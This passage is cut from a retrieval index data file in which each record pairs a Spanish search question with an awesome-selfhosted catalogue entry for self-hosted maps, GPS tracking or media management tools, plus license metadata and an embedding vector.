-0.02316, 0.01917, -0.05635, -0.15731, 0.00481, -0.00314, 0.05074, -0.00867, -0.07609, -0.12866, -0.05348, 0.11439, 0.08086, -0.03013, -0.16646, -0.03428, -0.01765, -0.04094, 0.09611, -0.12684, -0.12612, -0.08618, 0.06889, -0.00061, -0.14974, -0.06202, 0.00725, -0.07189, 0.04897, 0.07212, 0.06511, 0.22577, 0.00511, -0.04676, 0.015, -0.01381, -0.02238, 0.02286, 0.10483, 0.12535, -0.03367, 0.07905, 0.00463, -0.11332, -0.0014, -0.07359, 0.00612, -0.03387, 0.01597, -0.00621, 0.00375, -0.00888, 0.01286, 0.03787, 0.03171, 0.10028, -0.08324, -0.09241, -0.00418, -0.08087, -0.0993, 0.14914, -0.08469, 0.05096, 0.05003, -0.03065, 0.04146, -0.03387, 0.14078, -0.04242, 0.01494, 0.09767, 0.0025, -0.02843, 0.07758, 0.07466, -0.02284, -0.07312, 0.02342, -0.07489, 0.08035, 0.06243, 0.02815, -0.05924, 0.02286, 0.07324, 0.00098, -0.02569, -0.06778, -0.02781, -0.03803, 0.01467, 0.04548, -0.02596, -0.06946, -0.04547, 0.01261, -0.1216, -0.0491, 0.05786, 0.00079, -0.04004, 0.01579, 0.05773, -0.01733, -0.00217, 0.01388, -0.04555, -0.09981, -0.0347, 0.08315, 0.00132, -0.02074, 0.03907, 0.00375, 0.02393, 0.01779, 0.00229, -0.13337, -0.00324, 0.04797, -0.01074, 0.03821, -0.15408, 0.00379, -0.08701, 0.02645, -0.01933, 0.15567, 0.03574, 0.00947, -0.08837, -0.03249, -0.09983, 0.04835, 0.01365, 0.01829, 0.08194, 0.01367, 0.08772, -0.04253, 0.01024, -0.02043, -0.01497, 0.02074, -0.05574, 0.0646, 0.08033, -0.10098, 0.03347, -0.0384, 0.00933, -0.02599, 0.03945, 0.02381, -0.0244, 0.02295, -0.03777, -0.01069, -0.05157, 0.02552, 0.00593, 0.00356, 0.09931, 0.01227, -0.07784, 0.02856, 0.03689, 0.03664, -0.03469, -0.05512, 0.00691, -0.08248, -0.01498, 0.00978, -0.04571, -0.08241, 0.0237, 0.00983, -0.01732, 0.03461, 0.03732, 0.11426, 0.01337, 0.03118, 0.07582, -0.05949, -0.00276, -0.03369, -0.06426, -0.00734, 0.08322, -0.05509, -0.00139, -0.01792, 0.00181, 0.06699, -0.05582, -0.02393, -0.01436, 0.04459, 0.08602, 0.03315, 0.00945, -0.08171, 0.0875, -0.0004, 0.01287, 0.01196, 0.02789, 0.01294, 0.0442, -0.03823, -0.01577, -0.01392, 0.05316, 0.02367, -0.0347, 0.01931, -0.04986, -0.0296, -0.07243, -0.002, -0.0384, -0.07219, -0.0726, 0.04633, 0.06176, 0.04944, 0.02579, -0.02253]} +{"tipo": "pregunta", "herramienta": "Maps and Global Positioning System (GPS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Maps and Global Positioning System (GPS)", "tema": "maps and global positioning system (gps)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Maps and Global Positioning System (GPS): Open Source Routing Machine (OSRM) β€” High performance routing engine designed to run on OpenStreetMap data and offering an HTTP API, C++ library interface, and Nodejs wrapper [BSD-2-Clause, C++]. OpenRouteService β€” Route service with directions, isochrones, time-distance matrix, route optimization, etc [GPL-3.0, Docker/Java]. OpenStreetMap β€” Collaborative project to create a free editable map of the world [GPL-2.0, Ruby]. OpenTripPlanner β€” Multimodal trip planning software based on OpenStreetMap data and consuming published GTFS-formatted data to suggest routes using local public transit systems [LGPL-3.0, Java/Javascript]. OwnTracks Recorder β€” Store and access data published by [OwnTracks](https://owntracks.org/) location tracking apps [⚠, GPL-2.0, C/Lua/deb/Docker]. TileServer GL β€” Vector and raster maps with GL styles. Server side rendering by Mapbox GL Native. Map tile server for Mapbox GL JS, Android, iOS, Leaflet, OpenLayers, GIS via WMTS, etc [BSD-2-Clause, Nodejs/Docker].", "indexar": "con que puedo crear servidores de mapas vectoriales personalizados sin pagar licencias?", "v": [0.19887, -0.01321, -0.09885, -0.15876, -0.01462, -0.11589, 0.10632, -0.09518, -0.12788, -0.11559, 0.0361, -0.09976, 0.10655, -0.14929, 0.08343, 0.17187, 0.08844, -0.09939, 0.10412, 0.05578, 0.11901, 0.03144, -0.04662, -0.06935, -0.07252, 0.06335, 0.11864, -0.16486, -0.16527, 0.1095, -0.04905, 0.05107, 0.00095, -0.02969, -0.01679, -0.00985, -0.05158, 0.10337, 0.01257, -0.00961, 0.08889, 0.10063, -0.02437, -0.01339, -0.07538, -0.07331, 0.02149, 0.02321, 0.05031, -0.08851, -0.0788, -0.04707, -0.1633, -0.07882, -0.0125, -0.05419, 0.08776, -0.05671, 0.04098, -0.00315, -0.11477, 0.05608, 0.02059, 0.00196, 0.00589, 0.01723, 0.10678, 0.01364, 0.01633, -0.01878, -0.08613, -0.02454, 0.04735, -0.03954, 0.01565, 0.03615, -0.10983, -0.14364, 0.02956, 0.17735, 0.02701, -0.04037, -0.08208, -0.03341, -0.03221, -0.01151, -0.06696, 0.00971, 0.08461, -0.01602, 0.01357, 0.10229, -0.02178, 0.07358, -0.00983, -0.03173, 0.14352, -0.01345, -0.07454, 0.05038, -0.0525, 0.04642, -0.04793, 0.00682, -0.02435, 0.08367, 0.12966, -0.05522, 0.02836, 0.04924, 0.07386, 0.06923, -0.07026, 0.04642, 0.0087, -0.0231, -0.00637, 0.05598, 0.03408, 0.10595, -0.02023, -0.03217, 0.05284, 0.0172, 0.04071, 0.00651, -0.012, 0.13024, -0.07979, -0.03335, 0.008, -0.01479, -0.03501, 0.00758, -0.06409, 0.04554, 0.03587, -0.00546, -0.06096, -0.02255, 0.0051, 0.02665, 0.05065, -0.00376, 0.00854, 0.0367, -0.02736, -0.09159, -0.07443, -0.04798, -0.00473, -0.01393, -0.00654, 0.05457, -0.10314, -0.00638, -0.01844, -0.05403, -0.03954, 0.07309, 0.07722, 0.11543, -0.06657, 0.05774, 0.0333, 0.01733, -0.02545, 0.04502, 0.06574, 0.05961, -0.047, -0.05133, 0.04262, -0.04891, 0.06198, -0.03248, -0.05757, -0.02736, 0.00872, 0.0287, -0.03596, 0.00855, -0.04041, -0.0372, -0.05367, -0.00617, -0.0056, 0.03462, 0.05369, -0.00353, -0.034, 0.06711, 0.0236, -0.00905, 0.05107, -0.03074, 0.00867, 0.0343, -0.11898, -0.05151, 0.03592, -0.00584, -0.06012, -0.01385, -0.00366, -0.04528, -0.02903, 0.09501, 0.02123, 0.02427, -0.05778, -0.02013, 0.03672, -0.04086, -0.01158, 0.03699, 0.02168, -0.04742, -0.01149, -0.01123, 0.05262, 0.01466, -0.007, 0.02391, 0.04982, 0.03056, 0.02749, 0.02064, 0.04805, 0.01306, 0.00744, 0.04347, -0.04331, -0.03286, -0.01246, 0.02329, 0.029, -0.01915, -0.03585, -0.02521, 0.00867, 0.08878, -0.00638, -0.02808, -0.03444, -0.09484, -0.00084, -0.06428, -0.04254, -0.00869, 0.03778, 0.04879, 0.04897, 0.04211, 0.02329, -0.0058]} +{"tipo": "pregunta", "herramienta": "Maps and Global Positioning System (GPS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Maps and Global Positioning System (GPS)", "tema": "maps and global positioning system (gps)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Maps and Global Positioning System (GPS): Traccar β€” Java application to track GPS positions. Supports loads of tracking devices and protocols, has an Android and iOS App. Has a web interface to view your trips [Apache-2.0, Java]. TRIP β€” Minimalist POI Map tracker and Trip planner [MIT, Docker]. wanderer β€” Trail database where you can upload your recorded tracks or create new ones and add various metadata to build an easily searchable catalogue [AGPL-3.0, Docker/Go/Nodejs].", "indexar": "que programa sirve para rastrear posiciones GPS", "v": [0.18111, -0.05547, -0.08911, -0.22262, 0.11661, -0.13644, 0.09269, -0.11679, 0.0144, -0.01866, 0.07294, -0.03914, -0.04877, 0.06404, 0.14913, 0.03485, 0.04756, 0.04734, -0.04356, 0.08162, -0.11438, -0.02861, 0.07322, -0.13563, 0.00288, 0.08888, 0.04519, -0.12571, -0.14068, -0.02531, 0.00709, -0.02749, -0.1065, -0.13137, -0.14382, -0.11197, 0.03944, -0.02738, -0.04996, -0.05034, 0.05052, -0.06595, 0.0238, -0.00355, 0.01954, -0.081, 0.11785, -0.03004, 0.0156, -0.03597, -0.04662, 0.09667, -0.00384, -0.05072, 0.05192, -0.04367, 0.0484, -0.04908, -0.11577, -0.04847, -0.04356, -0.05003, 0.06162, -0.02394, -0.00137, 0.0335, 0.06008, 0.03651, -0.11904, -0.12047, -0.02221, 0.04733, 0.03468, 0.00315, 0.02925, 0.03329, 0.06147, 0.13711, 0.1369, -0.01796, 0.01403, -0.02087, -0.09022, 0.08713, -0.12087, 0.09838, 0.12409, 0.01661, -0.05972, -0.12552, 0.00824, 0.13971, -0.03227, 0.13694, 0.05441, 0.00347, 0.12161, 0.06903, 0.03781, 0.08315, 0.09849, -0.09396, 0.0033, 0.0384, -0.07448, 0.12801, 0.05919, -0.01835, -0.07078, 0.08282, 0.05691, 0.01209, -0.04721, -0.04794, -0.06571, -0.02703, -0.00049, 0.00132, 0.03718, -0.04655, -0.07767, 0.0149, -0.03869, 0.01084, 0.05187, -0.00094, -0.08423, 0.02134, 0.02817, 0.04054, 0.04865, -0.04148, -0.01168, -0.00093, -0.06704, 0.03515, 0.01813, 0.07889, -0.00874, 0.00046, 0.00527, 0.03571, 0.03545, -0.05033, -0.04627, 0.0399, 0.12216, -0.0167, -0.00282, 0.05206, -0.02073, 0.05472, -0.01924, 0.02587, 0.04567, -0.02943, 0.02477, -0.04513, -0.0673, 0.00081, -0.01288, -0.00026, -0.06442, -0.05395, 0.09134, -0.03019, -0.01508, 0.0173, 0.09236, 0.03605, -0.05139, 0.07033, 0.04678, -0.10863, -0.04986, -0.03809, 0.01809, -0.01654, 0.05075, 0.00589, -0.01183, 0.00786, 0.1029, 0.03828, 0.02864, 0.00978, -0.03926, -0.01125, -0.025, -0.01788, 0.02784, -0.00339, 0.00649, -0.05613, -0.05083, -0.04688, 0.01724, 0.01239, 0.02887, -0.04805, -0.06414, -0.06675, -0.00204, 0.05189, -0.00223, 0.02771, 0.02763, 0.04559, 0.06291, 0.07079, -0.06892, -0.05328, -0.00449, 0.01273, -0.09953, -0.06553, 0.0127, 0.04127, 0.06174, 0.01454, -0.04428, 0.03367, 0.03093, 0.02758, -0.00934, -0.08486, 0.03207, 0.00558, 0.0252, -0.03244, 0.05654, -0.04079, -0.05157, -0.01777, 0.04063, -0.00461, 0.03357, 0.01326, 0.02886, -0.09076, -0.00442, 0.04185, 0.01847, -0.01708, -0.01926, -0.02792, -0.01403, 0.00504, 0.04842, 0.00011, -0.06031, 0.0436, 0.05723, -0.00703, 0.04745, 0.03202]} +{"tipo": "pregunta", "herramienta": "Maps and Global Positioning System (GPS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Maps and Global Positioning System (GPS)", "tema": "maps and global positioning system (gps)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Maps and Global Positioning System (GPS): Traccar β€” Java application to track GPS positions. Supports loads of tracking devices and protocols, has an Android and iOS App. Has a web interface to view your trips [Apache-2.0, Java]. TRIP β€” Minimalist POI Map tracker and Trip planner [MIT, Docker]. wanderer β€” Trail database where you can upload your recorded tracks or create new ones and add various metadata to build an easily searchable catalogue [AGPL-3.0, Docker/Go/Nodejs].", "indexar": "cual es una alternativa libre para visualizar rutas de viaje en un mapa", "v": [-0.01337, 0.00956, -0.18008, -2e-05, -0.05744, 0.01389, -0.02836, -0.06047, -0.03849, -0.14313, -0.00307, -0.28137, 0.05934, 0.10951, 0.08586, -0.01928, 0.10174, 0.07351, 0.17069, -0.08131, -0.06681, -0.04032, -0.04464, 0.02006, -0.12488, -0.00572, 0.06641, -0.02393, -0.01108, -0.0459, 0.06617, 0.07088, 0.01577, -0.0441, -0.0002, -0.07375, 0.20571, 0.0804, 0.04069, -0.17003, 0.00492, -0.0607, -0.02808, 0.12982, -0.05812, -0.14821, -0.09281, -0.02204, -0.0669, 0.00141, -0.00688, -0.04229, -0.07782, 0.0212, 0.18378, 0.02792, 0.06737, -0.07126, -0.02634, 0.01279, -0.00567, 0.02523, -0.00222, 0.0093, 0.06557, -0.0138, 0.03275, 0.00045, -0.03786, -0.01102, -0.04843, 0.02929, 0.07208, 0.01436, -0.13735, 0.0287, -0.0263, 0.02568, 0.04237, 0.06651, 0.22652, -0.00066, -0.11433, 0.02581, -0.05955, -0.08288, 0.1402, -0.06263, 0.04763, 0.07621, -0.01937, 0.04072, 0.01569, 0.11318, -0.07568, -0.03371, 0.0007, 0.05733, 0.02547, 0.0811, 0.04388, -0.0359, -0.05109, 0.07915, -0.06578, 0.02944, 0.03299, 0.02577, -0.09845, 0.11742, 0.05381, 0.038, -0.02685, 0.01056, -0.02501, -0.06867, -0.0352, 0.013, -0.00866, -0.07045, -0.07044, 0.0261, -0.11181, -0.03721, 0.05627, 0.05136, -0.06692, 0.02608, -0.00357, -0.02524, 0.10087, 0.04443, -0.07477, -0.10495, -0.07472, -0.01788, 0.05181, 0.01989, 0.05756, -0.01682, 0.00306, 0.04779, -0.01486, -0.02378, 0.00015, 0.02405, -0.00856, -0.04356, -0.0818, 0.04589, -0.08113, 0.03519, -0.0056, 0.11159, 0.0882, 0.05114, -0.0543, -0.03677, -0.09077, 0.0948, 0.0701, 0.00598, -0.01386, 0.05252, 0.0801, -0.06589, -0.02881, -0.07196, -0.02085, -0.03885, -0.04922, 0.08145, 0.10205, -0.07337, 0.04393, -0.05114, -0.03053, -0.02867, 0.02406, 0.00769, 0.00737, -0.00394, -0.04542, 0.00233, -0.0472, 0.00322, 0.02902, 0.01998, 0.0728, 0.00035, -0.04489, 0.0321, -0.00819, -0.01384, -0.01814, -0.04231, 0.04076, -0.02415, -0.03531, -0.04207, -0.03285, -0.06458, -0.0076, -0.04987, 0.00588, 0.02611, -0.01532, 0.05625, 0.01355, 0.07606, 0.04495, -0.01257, 0.05182, -0.03322, -0.03846, 0.01587, 0.03013, -0.02375, -0.00444, 0.01547, 0.03272, 0.06297, -0.01056, -0.01326, 0.04235, 0.02203, 0.02814, 0.00094, -0.0289, -0.01411, 0.05214, 0.03272, -0.00238, 0.0358, 0.02734, 0.01786, 0.01718, -0.00415, -0.03308, -0.02156, 0.05842, 0.0533, -0.0097, -0.0162, -0.05286, -0.01971, -0.07197, 0.01246, -0.0139, -0.08161, -0.04002, 0.04343, 0.07349, 0.05481, 0.01817, -0.03481]} +{"tipo": "pregunta", "herramienta": "Maps and Global Positioning System (GPS)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Maps and Global Positioning System (GPS)", "tema": "maps and global positioning system (gps)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Maps and Global Positioning System (GPS): Traccar β€” Java application to track GPS positions. Supports loads of tracking devices and protocols, has an Android and iOS App. Has a web interface to view your trips [Apache-2.0, Java]. TRIP β€” Minimalist POI Map tracker and Trip planner [MIT, Docker]. wanderer β€” Trail database where you can upload your recorded tracks or create new ones and add various metadata to build an easily searchable catalogue [AGPL-3.0, Docker/Go/Nodejs].", "indexar": "con que puedo subir mis trayectos y crear un catΓ‘logo searchable", "v": [0.20932, 0.03785, -0.29715, 0.04042, 0.04973, -0.09371, 0.02674, 0.04588, -0.06441, -0.07002, -0.12208, -0.06131, -0.02791, -0.06357, -0.01027, 0.08009, 0.03833, -0.09652, 0.01894, 0.02937, 0.11104, -0.03329, -0.03035, -0.16668, -0.01915, -0.04628, -0.01672, -0.01152, -0.09208, 0.02367, -0.0556, 0.16158, 0.01177, 0.00762, 0.02772, -0.09579, 0.03649, 0.10262, -0.10978, -0.10458, -0.00881, -0.0473, -0.08955, 0.07508, -0.1232, -0.06158, 0.00132, -0.01218, -0.14163, 0.03712, 0.06344, -0.0375, -0.17088, 0.01036, 0.00067, -0.07836, 0.05525, -0.0171, 0.05155, -0.03853, 0.04482, -0.02029, 0.04269, -0.02427, -0.11899, -0.08566, -0.00161, 0.04899, -0.10436, -0.02677, -0.07159, -0.03247, -0.0769, 0.0865, 0.01274, 0.11216, -0.00868, -0.01083, 0.06686, 6e-05, 0.06816, 0.01023, -0.03613, 0.03224, -0.05827, -0.02251, 0.07939, -0.03775, 0.0608, -0.01841, 0.06706, -0.1194, -0.01095, -0.01541, -0.03462, 0.0775, 0.0652, -0.08454, 0.04744, 0.00588, -0.10116, 0.00098, -0.03414, 0.12205, 0.00733, 0.08808, 0.04116, 0.02248, 0.0047, 0.02139, 0.06635, -0.03991, 0.02846, -0.11847, -0.00971, -0.06523, -0.0943, 0.02147, -0.01471, -0.02961, 0.00825, -0.08337, -0.01138, -0.00969, 0.04201, -0.02316, -0.02594, 0.00698, -0.0189, -0.00381, 0.08269, 0.08192, -0.08186, -0.14702, -0.01466, 0.04025, -0.03207, 0.03272, 0.10398, 0.01394, 0.04366, 0.048, -0.01017, -0.10049, -0.00589, -0.02343, -0.0521, -0.05793, 0.00197, -0.04392, -0.04465, 0.0674, 0.06133, 0.06002, -0.02311, 0.02571, -0.01955, -0.02797, -0.00596, 0.06015, 0.03246, 0.03238, -0.02868, 0.04341, 0.04337, -0.03416, -0.09621, -0.14405, 0.03556, -0.025, -0.12019, 0.02636, -0.02798, -0.12188, 0.05483, -0.0312, -0.02257, -0.07256, 0.1137, 0.00034, -0.09534, -0.02816, -0.03737, -0.00956, -0.07567, -0.10511, 0.02552, -0.05873, 0.08149, -0.00279, -0.0521, -0.00094, -0.0189, 0.04611, -0.03527, -0.03327, 0.00173, -0.00205, 0.02057, -0.03888, -0.02197, 0.01657, -0.07993, -0.03544, 0.01869, -0.03942, 0.00888, 0.02951, 0.07422, 0.04503, -0.02725, -0.02775, 0.01615, -0.06311, -0.01082, -0.01866, 0.03306, -0.06842, -0.0512, -0.02533, 0.02581, 0.09859, 0.07629, 0.01192, -0.00443, -0.00392, 0.01001, -0.01926, 0.01931, -0.02273, 0.01182, -0.02071, -0.00215, -0.08555, 0.02596, 0.00574, 0.03293, -0.02484, -0.07156, -0.00282, 0.02863, 0.0381, 0.01396, 0.00829, -0.00905, -0.06207, -0.06662, 0.06961, -0.02747, -0.06696, -0.02398, -0.02504, 0.08368, -0.01516, -0.01698, -0.07143]} +{"tipo": "pregunta", "herramienta": "Media Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Management", "tema": "media management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Management: ChannelTube β€” Download video or audio from YouTube channels on a schedule via yt-dlp [⚠, AGPL-3.0, Docker]. Deleterr β€” Automated media cleanup tool that removes watched and stale content from Plex, Sonarr, and Radarr based on configurable rules [MIT, Docker]. Downtify β€” Download Spotify music with album art and metadata [⚠, GPL-3.0, Docker]. Lidarr β€” Music collection manager for Usenet and BitTorrent users [GPL-3.0, C#/Docker]. LidaTube β€” Finding and fetch missing Lidarr albums via yt-dlp [⚠, GPL-3.0, Docker]. Lidify β€” Music discovery tool that provides recommendations based on selected Lidarr artists, using Spotify or LastFM [⚠, MIT, Docker]. Medusa β€” Automatic Video library manager for TV Shows. It watches for new episodes of your favorite shows, and when they are posted it does its magic [GPL-3.0, Python]. MeTube β€” Web GUI for youtube-dl, with playlist support. Allows downloading videos from dozens of websites [AGPL-3.0, Python/Nodejs/Docker].", "indexar": "con quΓ© puedo descargar videos de YouTube automΓ‘ticamente?", "v": [0.00583, 0.15233, -0.05097, -0.03108, 0.0026, 0.08509, -0.03779, -0.0115, 0.02939, -0.1197, -0.10573, -0.16766, -0.00895, -0.00345, -0.12693, -0.03994, 0.11727, -0.0565, 0.11314, -0.07012, 0.16814, -0.0792, -0.07542, -0.12462, 0.0007, -0.01695, -0.0308, 0.057, -0.09292, -0.10311, -0.02238, 0.10845, -0.07294, 0.06104, -0.13271, 0.05265, 0.08518, 0.10572, -0.06174, 0.01047, -0.01176, 0.01486, -0.12704, 0.10761, -0.02278, 0.01965, 0.07857, -0.06492, -0.05738, -0.10532, 0.07835, 0.05657, -0.09509, -0.02999, -0.0758, -0.03074, 0.12495, -0.13849, -0.01205, -0.01922, -0.0057, -0.05437, 0.06089, 0.0722, -0.00353, 0.09138, 0.04539, 0.13406, -0.01547, 0.06288, -0.04999, 0.00408, -0.02616, 0.02827, 0.08346, 0.14868, -0.0541, -0.01073, -0.07086, 0.0461, 0.02954, -0.11154, 0.01088, -0.00628, -0.0157, -0.0879, -0.04889, -0.05491, 0.02157, -0.20764, 0.00012, 0.05125, 0.07327, 0.02295, -0.041, -0.03514, 0.03878, -0.0241, -0.00901, -0.07194, -0.05532, -0.05304, 0.02419, 0.10859, 0.0494, 0.08892, 0.0303, -0.09396, -0.05923, 0.00082, 0.03634, 0.03686, -0.06007, -0.08521, -0.01902, 0.03289, -0.05931, -0.02482, -0.00248, 0.02122, 0.0393, -0.01964, -0.08306, -0.07826, 0.01413, -0.00491, -0.01668, 0.07972, -0.02254, 0.0105, 0.0482, -0.06824, -0.03982, -0.02678, 0.06948, -0.01766, 0.06332, -0.00986, -0.13333, -0.07063, 0.07058, -0.02381, 0.01074, -0.04771, 0.09177, -0.07711, 0.01366, -0.12141, -0.07462, 0.01141, 0.00525, 0.0152, -0.03649, -0.08421, 0.01618, 0.02666, 0.01458, -0.08365, -0.03612, -0.01793, 0.09008, -0.03993, -0.02169, -0.03634, -0.09632, 0.08169, -0.04082, 0.03886, -0.05642, 0.03298, -0.00096, 0.06576, -0.01896, -0.07542, -0.05205, -0.05705, 0.0186, -0.01308, 0.09785, -0.00412, -0.11107, 0.0372, 0.0008, 0.03901, -0.04273, -0.10293, -0.02489, -0.00757, 0.00539, 0.09401, -0.05982, -0.00592, -0.05645, 0.01283, 0.02185, -0.02062, -0.09823, -0.04095, -0.01375, 0.00675, -0.06704, -0.05254, -0.00536, 0.01108, -0.04306, -0.02415, 0.00724, -0.00717, -0.00674, -0.02728, -0.02849, -0.02347, 0.01602, -0.0462, 0.02342, -0.00514, 0.07973, 0.01551, 0.02529, -0.00664, 0.02267, 0.0294, 0.07261, -0.02632, -0.02654, 0.11563, 0.04385, 0.04299, -0.01584, 0.02999, -0.08309, 0.00803, -0.05982, -0.08029, 0.09164, 0.02827, 0.00858, 0.02248, -0.02538, 0.02591, -0.01046, 0.06183, 0.00222, -0.02231, -0.04896, -0.0919, -0.04793, 0.04587, 0.0816, -0.09819, -0.012, 0.05552, 0.01748, 0.01671, -0.02466, 0.01258]} +{"tipo": "pregunta", "herramienta": "Media Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Management", "tema": "media management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Management: ChannelTube β€” Download video or audio from YouTube channels on a schedule via yt-dlp [⚠, AGPL-3.0, Docker]. Deleterr β€” Automated media cleanup tool that removes watched and stale content from Plex, Sonarr, and Radarr based on configurable rules [MIT, Docker]. Downtify β€” Download Spotify music with album art and metadata [⚠, GPL-3.0, Docker]. Lidarr β€” Music collection manager for Usenet and BitTorrent users [GPL-3.0, C#/Docker]. LidaTube β€” Finding and fetch missing Lidarr albums via yt-dlp [⚠, GPL-3.0, Docker]. Lidify β€” Music discovery tool that provides recommendations based on selected Lidarr artists, using Spotify or LastFM [⚠, MIT, Docker]. Medusa β€” Automatic Video library manager for TV Shows. It watches for new episodes of your favorite shows, and when they are posted it does its magic [GPL-3.0, Python]. MeTube β€” Web GUI for youtube-dl, with playlist support. Allows downloading videos from dozens of websites [AGPL-3.0, Python/Nodejs/Docker].", "indexar": "quΓ© programa sirve para limpiar archivos antiguos de mi biblioteca de mΓΊsica?", "v": [0.1148, -0.0012, -0.04438, -0.09128, -0.05517, -0.18134, -0.15203, -0.01105, -0.07113, -0.15676, -0.00969, -0.09356, 0.08929, 0.00481, 0.07721, -0.09652, 0.10128, -0.09195, 0.09685, 0.01436, 0.00904, 0.0937, -0.06175, 0.02449, -0.08921, -0.04712, 0.10833, 0.06383, -0.13152, 0.14384, -0.02674, 0.06791, 0.09063, -0.06004, -0.06404, 0.04107, 0.10913, -0.00207, -0.09366, -0.04537, 0.02249, 0.02377, 0.03373, 0.09529, -0.0393, -0.10767, 0.16004, 0.02906, -0.0264, 0.07468, -0.02107, 0.03111, 0.02937, 0.04511, 0.08553, -0.09805, -0.09863, -0.06272, -0.01843, -0.01347, -0.063, 0.01379, -0.01818, 0.00104, 0.11312, -0.02165, 0.0341, 0.03819, 0.01672, 0.10184, -0.06245, 0.10598, 0.1352, 0.00961, -0.16327, 0.01777, -0.00719, -0.10142, 0.03467, -0.01518, 0.01823, -0.04847, 0.00418, -0.0091, -0.09985, -0.00402, 0.07618, 0.00947, -0.02779, 0.02349, -0.08094, 0.04368, -0.0507, 0.05979, 0.11554, -0.02005, 0.10121, 0.06878, 0.04468, 0.06565, 0.03854, -0.07707, -0.01978, 0.05043, -0.03392, 0.05339, -0.00783, -0.04717, 0.02487, -0.05367, 0.03511, -0.00636, 0.01642, -0.0202, -0.10353, 0.01425, 0.04158, -0.03116, 0.01794, 0.04018, -0.09314, 0.0471, -0.05539, 0.02434, 0.07635, 0.02799, 0.12651, 0.04638, 0.00732, 0.06532, 0.02159, 0.02066, -0.03297, -0.01422, -0.07057, -0.07517, 0.00495, -0.11789, -0.03639, -0.00098, 0.16282, 0.09409, -0.03963, 0.05266, 0.07743, -0.09448, 0.1427, -0.00484, -0.01012, -0.0719, -0.04273, 0.0087, -0.01336, 0.01019, -0.01702, 0.08304, 0.10822, -0.07604, -0.09722, -0.08464, -0.08134, -0.02356, -0.02725, -0.05426, -0.03482, -0.01592, 0.0668, 0.05125, 0.06321, -0.00759, -0.04436, -0.0091, 0.02973, -0.09939, -0.10552, -0.00749, -0.02365, -0.07046, 0.15386, 0.05733, -0.0981, 0.00056, 0.02343, -0.03568, -0.05641, -0.06867, 0.00675, -0.03938, -0.06322, -0.05769, -0.02224, -0.03574, -0.03102, -0.022, 0.03253, -0.01176, -0.06903, 0.02795, -0.03113, 0.02558, -0.01388, -0.04528, -0.0088, 0.06216, 0.05706, 0.00574, -0.02694, -0.00394, 0.04632, 0.00259, 0.04849, 0.0096, 0.03487, 0.05698, -0.03936, -0.02069, -0.06997, 0.03526, 0.08387, 0.02526, 0.00331, 0.02123, 0.09516, 0.01715, 0.01894, -0.01962, 0.03802, -0.02766, 0.09127, 0.03271, -0.0385, -0.03827, -0.02604, -0.02171, 0.00619, -0.00011, -0.03251, -0.01535, -0.03591, -0.05364, -0.04191, 0.02156, -0.04821, -0.07408, 0.04302, -0.02266, -0.02291, -0.0037, -0.00514, 0.01202, -0.01404, 0.005, 0.01915, 0.01177, 0.06581, 0.03136]} +{"tipo": "pregunta", "herramienta": "Media Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Management", "tema": "media management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Management: ChannelTube β€” Download video or audio from YouTube channels on a schedule via yt-dlp [⚠, AGPL-3.0, Docker]. Deleterr β€” Automated media cleanup tool that removes watched and stale content from Plex, Sonarr, and Radarr based on configurable rules [MIT, Docker]. Downtify β€” Download Spotify music with album art and metadata [⚠, GPL-3.0, Docker]. Lidarr β€” Music collection manager for Usenet and BitTorrent users [GPL-3.0, C#/Docker]. LidaTube β€” Finding and fetch missing Lidarr albums via yt-dlp [⚠, GPL-3.0, Docker]. Lidify β€” Music discovery tool that provides recommendations based on selected Lidarr artists, using Spotify or LastFM [⚠, MIT, Docker]. Medusa β€” Automatic Video library manager for TV Shows. It watches for new episodes of your favorite shows, and when they are posted it does its magic [GPL-3.0, Python]. MeTube β€” Web GUI for youtube-dl, with playlist support. Allows downloading videos from dozens of websites [AGPL-3.0, Python/Nodejs/Docker].", "indexar": "cual es una herramienta para gestionar y organizar mis colecciones de pelΓ­culas y series?", "v": [0.10847, 0.10039, -0.07053, -0.16472, -0.0204, -0.16608, 0.01472, 0.0452, -0.08127, -0.14606, -0.11534, -0.08734, -0.07641, -0.08399, 0.08851, 0.00396, 0.08553, -0.16304, -0.02398, 0.07564, -0.06031, 0.08165, 0.00677, -0.02706, -0.00565, -0.03015, 0.16617, -0.06701, -0.14044, 0.10932, -0.01961, 0.04024, 0.08627, -0.15052, 0.0031, -0.04294, -0.06903, 0.02682, -0.10967, -0.00038, -0.10949, 0.00777, -0.12048, 0.07879, 0.04348, -0.01469, 0.00622, 0.03894, 0.00224, 0.04081, -0.06526, -0.00283, -0.07563, 0.0689, 0.10667, -0.20403, 0.04145, -0.0073, 0.03903, 0.02466, -0.04482, -0.00825, -0.02354, 0.02796, 0.01223, -0.02883, -0.0748, -0.08884, -0.10232, -0.03802, -0.09804, -0.0401, -0.02492, 0.03537, 0.0933, 0.04375, 0.03792, 0.00029, 0.00331, -0.0548, 0.05775, -0.06458, -0.01688, 0.02859, -0.05119, -0.10733, 0.0765, -0.00866, 0.00197, -0.09906, -0.06222, -0.06465, -0.08148, -0.07715, 0.02983, 0.00789, 0.11407, -0.00533, 0.11403, 0.06796, 0.02363, -0.0504, -0.09413, 0.07159, -0.0913, 0.08558, 0.0218, 0.0171, -0.00286, -0.08226, -0.11089, 0.04601, -0.00687, -0.05449, -0.00976, -0.00045, 9e-05, -0.01637, 0.02184, 0.02656, -0.05783, -0.05057, -0.0268, -0.06998, 